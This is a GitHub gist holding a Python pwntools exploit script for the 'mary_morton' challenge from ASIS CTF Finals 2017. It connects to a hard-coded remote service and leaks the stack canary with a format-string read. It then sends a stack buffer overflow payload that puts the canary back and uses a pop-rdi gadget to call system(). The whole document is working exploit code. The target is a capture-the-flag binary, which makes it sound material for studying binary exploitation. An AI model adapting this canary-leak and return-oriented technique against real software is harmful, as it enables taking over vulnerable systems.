
@0xPwny
Last active September 12, 2017 22:14
ASIS CTF FINALS 2017 - mary_morton pwnable
#!/usr/bin/python
from pwn import *
# Target selection: the commented-out line runs the challenge binary locally,
# the active one connects to the CTF service used during the event.
# r = process("./mary_morton")
HOST, PORT = '146.185.132.36', 19153
r = remote(HOST, PORT)
def fmtstr(pld):
    """Send *pld* through menu entry "2" and return the reply parsed as hex.

    Waits until the menu text ending in 'Exit' has been received, selects
    entry "2" (the path this script uses for the format-string input),
    sends the payload, discards one reply line and converts the following
    line from hexadecimal to an int.
    """
    r.recvuntil('Exit')
    r.sendline("2")
    r.sendline(pld)
    r.recvline()  # first reply line is not needed; the value is on the next
    leaked = r.recvline().strip(" ")
    # int() ignores the trailing newline that strip(" ") leaves in place.
    return int(leaked, 16)
def stackbof(pld):
    """Send *pld* through menu entry "1" and print the third reply line.

    Waits for the menu text ending in "Exit", selects entry "1" (the path
    this script uses for the stack-buffer input), sends the payload, drops
    the first two reply lines and prints the one after them.
    """
    r.recvuntil("Exit")
    r.sendline("1")
    r.sendline(pld)
    for _ in range(2):
        r.recvline()  # two lines of output precede the one that is printed
    # Parenthesised single-argument form prints the same text under Python 2.
    print(r.recvline())
# Hard-coded addresses taken from this specific challenge binary. They are
# only meaningful if the binary is mapped at a fixed base (presumably a
# non-PIE build -- confirm); any rebuild or a PIE build invalidates them.
poprdi = 0x400ab3   # gadget that pops a value into rdi
system = 0x4006a0   # presumably the binary's entry for system() -- confirm
flag = 0x400b2b     # presumably a command string inside the binary -- confirm

# Read the stack canary VALUE (not its address) with the format-string
# helper; the author found it at positional argument 23. A format-string
# read of this kind is what defeats the canary here: the overflow check
# passes because the original value is written back.
canary = fmtstr("%23$p")

payload = "".join([
    "A" * 136,       # fill the buffer up to the canary
    p64(canary),     # restore the canary so the stack-smashing check passes
    "BBBBCCCC",      # 8 filler bytes (presumably the saved frame pointer slot)
    p64(poprdi),     # load the next value into rdi (first argument register)
    p64(flag),       # argument for system()
    p64(system),     # call system() with that argument
])
stackbof(payload)